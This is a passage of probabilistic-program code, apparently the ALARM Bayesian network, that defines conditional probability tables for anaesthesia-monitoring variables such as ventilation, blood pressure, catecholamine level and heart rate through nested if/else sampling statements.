    HISTORY ~= choice({'TRUE' : 0.9, 'FALSE' : 0.09999999999999998})
else:
    HISTORY ~= choice({'TRUE' : 0.01, 'FALSE' : 0.99})
if (HYPOVOLEMIA == 'TRUE'):
    if (LVFAILURE == 'TRUE'):
        LVEDVOLUME ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
    else:
        LVEDVOLUME ~= choice({'LOW' : 0.01, 'NORMAL' : 0.09, 'HIGH' : 0.9})
else:
    if(LVFAILURE == 'TRUE'):
        LVEDVOLUME ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        LVEDVOLUME ~= choice({'LOW' : 0.05, 'NORMAL' : 0.9, 'HIGH' : 0.04999999999999993})
if (PULMEMBOLUS == 'TRUE'):
    PAP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.19, 'HIGH' : 0.8})
else:
    PAP ~= choice({'LOW' : 0.05, 'NORMAL' : 0.9, 'HIGH' : 0.04999999999999993})
if (LVEDVOLUME == 'LOW'):
    PCWP ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
elif(LVEDVOLUME == 'NORMAL'):
    PCWP ~= choice({'LOW' : 0.04, 'NORMAL' : 0.95, 'HIGH' : 0.010000000000000009})
else:
    PCWP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.04, 'HIGH' : 0.95})
if (INTUBATION == 'NORMAL'):
    if (KINKEDTUBE == 'TRUE'):
        if (VENTTUBE == 'ZERO'):
            PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            PRESS ~= choice({'ZERO' : 0.05, 'LOW' : 0.25, 'NORMAL' : 0.25, 'HIGH' : 0.44999999999999996})
        elif(VENTTUBE == 'NORMAL'):
            PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        else:
            PRESS ~= choice({'ZERO' : 0.2, 'LOW' : 0.75, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
    else:
        if(VENTTUBE == 'ZERO'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
        elif(VENTTUBE == 'LOW'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.29, 'NORMAL' : 0.3, 'HIGH' : 0.4})
        elif(VENTTUBE == 'NORMAL'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
        else:
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.9, 'NORMAL' : 0.08, 'HIGH' : 0.010000000000000009})
elif(INTUBATION == 'ESOPHAGEAL'):
    if(KINKEDTUBE == 'TRUE'):
        if(VENTTUBE == 'ZERO'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.3, 'NORMAL' : 0.49, 'HIGH' : 0.19999999999999996})
        elif(VENTTUBE == 'LOW'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.15, 'NORMAL' : 0.25, 'HIGH' : 0.59})
        elif(VENTTUBE == 'NORMAL'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        else:
            PRESS ~= choice({'ZERO' : 0.2, 'LOW' : 0.7, 'NORMAL' : 0.09, 'HIGH' : 0.01000000000000012})
    else:
        if(VENTTUBE == 'ZERO'):
            PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.08, 'HIGH' : 0.9})
        elif(VENTTUBE == 'NORMAL'):
            PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        else:
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.38, 'HIGH' : 0.6})
else:
    if(KINKEDTUBE == 'TRUE'):
        if(VENTTUBE == 'ZERO'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.08, 'HIGH' : 0.9})
        elif(VENTTUBE == 'LOW'):
            PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'NORMAL'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
        else:
            PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        if(VENTTUBE == 'ZERO'):
            PRESS ~= choice({'ZERO' : 0.1, 'LOW' : 0.84, 'NORMAL' : 0.05, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
        elif(VENTTUBE == 'NORMAL'):
            PRESS ~= choice({'ZERO' : 0.4, 'LOW' : 0.58, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        else:
            PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (INTUBATION == 'NORMAL'):
    if (KINKEDTUBE == 'TRUE'):
        if (VENTTUBE == 'ZERO'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'NORMAL'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        else:
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        if(VENTTUBE == 'ZERO'):
            VENTLUNG ~= choice({'ZERO' : 0.3, 'LOW' : 0.68, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            VENTLUNG ~= choice({'ZERO' : 0.95, 'LOW' : 0.03, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'NORMAL'):
            VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
        else:
            VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(INTUBATION == 'ESOPHAGEAL'):
    if(KINKEDTUBE == 'TRUE'):
        if(VENTTUBE == 'ZERO'):
            VENTLUNG ~= choice({'ZERO' : 0.95, 'LOW' : 0.03, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'NORMAL'):
            VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        else:
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        if(VENTTUBE == 'ZERO'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            VENTLUNG ~= choice({'ZERO' : 0.5, 'LOW' : 0.48, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'NORMAL'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        else:
            VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
    if(KINKEDTUBE == 'TRUE'):
        if(VENTTUBE == 'ZERO'):
            VENTLUNG ~= choice({'ZERO' : 0.4, 'LOW' : 0.58, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'NORMAL'):
            VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
        else:
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        if(VENTTUBE == 'ZERO'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'LOW'):
            VENTLUNG ~= choice({'ZERO' : 0.3, 'LOW' : 0.68, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        elif(VENTTUBE == 'NORMAL'):
            VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
        else:
            VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (LVEDVOLUME == 'LOW'):
    CVP ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
elif(LVEDVOLUME == 'NORMAL'):
    CVP ~= choice({'LOW' : 0.04, 'NORMAL' : 0.95, 'HIGH' : 0.010000000000000009})
else:
    CVP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.29, 'HIGH' : 0.7})
if (INTUBATION == 'NORMAL'):
    if (VENTLUNG == 'ZERO'):
        MINVOL ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
    elif(VENTLUNG == 'NORMAL'):
        MINVOL ~= choice({'ZERO' : 0.5, 'LOW' : 0.48, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(INTUBATION == 'ESOPHAGEAL'):
    if(VENTLUNG == 'ZERO'):
        MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        MINVOL ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'NORMAL'):
        MINVOL ~= choice({'ZERO' : 0.5, 'LOW' : 0.48, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
    if(VENTLUNG == 'ZERO'):
        MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        MINVOL ~= choice({'ZERO' : 0.6, 'LOW' : 0.38, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'NORMAL'):
        MINVOL ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (INTUBATION == 'NORMAL'):
    if (VENTLUNG == 'ZERO'):
        VENTALV ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
    elif(VENTLUNG == 'NORMAL'):
        VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
    else:
        VENTALV ~= choice({'ZERO' : 0.03, 'LOW' : 0.95, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(INTUBATION == 'ESOPHAGEAL'):
    if(VENTLUNG == 'ZERO'):
        VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        VENTALV ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'NORMAL'):
        VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
    else:
        VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.94, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
else:
    if(VENTLUNG == 'ZERO'):
        VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'NORMAL'):
        VENTALV ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.88, 'NORMAL' : 0.1, 'HIGH' : 0.010000000000000009})
if (VENTALV == 'ZERO'):
    ARTCO2 ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
elif(VENTALV == 'LOW'):
    ARTCO2 ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
elif(VENTALV == 'NORMAL'):
    ARTCO2 ~= choice({'LOW' : 0.04, 'NORMAL' : 0.92, 'HIGH' : 0.039999999999999925})
else:
    ARTCO2 ~= choice({'LOW' : 0.9, 'NORMAL' : 0.09, 'HIGH' : 0.010000000000000009})
if (ARTCO2 == 'LOW'):
    if (VENTLUNG == 'ZERO'):
        EXPCO2 ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'NORMAL'):
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
    else:
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
elif(ARTCO2 == 'NORMAL'):
    if(VENTLUNG == 'ZERO'):
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        EXPCO2 ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'NORMAL'):
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
    else:
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
else:
    if(VENTLUNG == 'ZERO'):
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'LOW'):
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
    elif(VENTLUNG == 'NORMAL'):
        EXPCO2 ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (FIO2 == 'LOW'):
    if (VENTALV == 'ZERO'):
        PVSAT ~= choice({'LOW' : 1.0, 'NORMAL' : 0.0, 'HIGH' : 0.0})
    elif(VENTALV == 'LOW'):
        PVSAT ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
    elif(VENTALV == 'NORMAL'):
        PVSAT ~= choice({'LOW' : 1.0, 'NORMAL' : 0.0, 'HIGH' : 0.0})
    else:
        PVSAT ~= choice({'LOW' : 0.01, 'NORMAL' : 0.95, 'HIGH' : 0.040000000000000036})
else:
    if(VENTALV == 'ZERO'):
        PVSAT ~= choice({'LOW' : 0.99, 'NORMAL' : 0.01, 'HIGH' : 0.0})
    elif(VENTALV == 'LOW'):
        PVSAT ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
    elif(VENTALV == 'NORMAL'):
        PVSAT ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
    else:
        PVSAT ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (PVSAT == 'LOW'):
    if (SHUNT == 'NORMAL'):
        SAO2 ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        SAO2 ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(PVSAT == 'NORMAL'):
    if(SHUNT == 'NORMAL'):
        SAO2 ~= choice({'LOW' : 0.01, 'NORMAL' : 0.98, 'HIGH' : 0.010000000000000009})
    else:
        SAO2 ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
    if(SHUNT == 'NORMAL'):
        SAO2 ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
    else:
        SAO2 ~= choice({'LOW' : 0.69, 'NORMAL' : 0.3, 'HIGH' : 0.010000000000000009})
if (ARTCO2 == 'LOW'):
    if (INSUFFANESTH == 'TRUE'):
        if (SAO2 == 'LOW'):
            if (TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
        elif(SAO2 == 'NORMAL'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
        else:
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
    else:
        if(SAO2 == 'LOW'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
        elif(SAO2 == 'NORMAL'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
        else:
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
elif(ARTCO2 == 'NORMAL'):
    if(INSUFFANESTH == 'TRUE'):
        if(SAO2 == 'LOW'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
        elif(SAO2 == 'NORMAL'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
        else:
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.99, 'HIGH' : 0.010000000000000009})
    else:
        if(SAO2 == 'LOW'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
        elif(SAO2 == 'NORMAL'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.99, 'HIGH' : 0.010000000000000009})
        else:
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.99, 'HIGH' : 0.010000000000000009})
else:
    if(INSUFFANESTH == 'TRUE'):
        if(SAO2 == 'LOW'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
        elif(SAO2 == 'NORMAL'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
        else:
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.3, 'HIGH' : 0.7})
    else:
        if(SAO2 == 'LOW'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
        elif(SAO2 == 'NORMAL'):
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.3, 'HIGH' : 0.7})
        else:
            if(TPR == 'LOW'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            elif(TPR == 'NORMAL'):
                CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
            else:
                CATECHOL ~= choice({'NORMAL' : 0.3, 'HIGH' : 0.7})
if (CATECHOL == 'NORMAL'):
    HR ~= choice({'LOW' : 0.05, 'NORMAL' : 0.9, 'HIGH' : 0.04999999999999993})
else:
    HR ~= choice({'LOW' : 0.01, 'NORMAL' : 0.09, 'HIGH' : 0.9})
if (ERRLOWOUTPUT == 'TRUE'):
    if (HR == 'LOW'):
        HRBP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(HR == 'NORMAL'):
        HRBP ~= choice({'LOW' : 0.3, 'NORMAL' : 0.4, 'HIGH' : 0.30000000000000004})
    else:
        HRBP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.98, 'HIGH' : 0.010000000000000009})
else:
    if(HR == 'LOW'):
        HRBP ~= choice({'LOW' : 0.4, 'NORMAL' : 0.59, 'HIGH' : 0.010000000000000009})
    elif(HR == 'NORMAL'):
        HRBP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        HRBP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (ERRCAUTER == 'TRUE'):
    if (HR == 'LOW'):
        HREKG ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
    elif(HR == 'NORMAL'):
        HREKG ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
    else:
        HREKG ~= choice({'LOW' : 0.01, 'NORMAL' : 0.98, 'HIGH' : 0.010000000000000009})
else:
    if(HR == 'LOW'):
        HREKG ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
    elif(HR == 'NORMAL'):
        HREKG ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        HREKG ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (ERRCAUTER == 'TRUE'):
    if (HR == 'LOW'):
        HRSAT ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
    elif(HR == 'NORMAL'):
        HRSAT ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
    else:
        HRSAT ~= choice({'LOW' : 0.01, 'NORMAL' : 0.98, 'HIGH' : 0.010000000000000009})
else:
    if(HR == 'LOW'):
        HRSAT ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
    elif(HR == 'NORMAL'):
        HRSAT ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        HRSAT ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (HR == 'LOW'):
    if (STROKEVOLUME == 'LOW'):
        CO ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(STROKEVOLUME == 'NORMAL'):
        CO ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
    else:
        CO ~= choice({'LOW' : 0.3, 'NORMAL' : 0.69, 'HIGH' : 0.010000000000000009})
elif(HR == 'NORMAL'):
    if(STROKEVOLUME == 'LOW'):
        CO ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
    elif(STROKEVOLUME == 'NORMAL'):
        CO ~= choice({'LOW' : 0.04, 'NORMAL' : 0.95, 'HIGH' : 0.010000000000000009})
    else:
        CO ~= choice({'LOW' : 0.01, 'NORMAL' : 0.3, 'HIGH' : 0.69})
else:
    if(STROKEVOLUME == 'LOW'):
        CO ~= choice({'LOW' : 0.8, 'NORMAL' : 0.19, 'HIGH' : 0.010000000000000009})
    elif(STROKEVOLUME == 'NORMAL'):
        CO ~= choice({'LOW' : 0.01, 'NORMAL' : 0.04, 'HIGH' : 0.95})
    else:
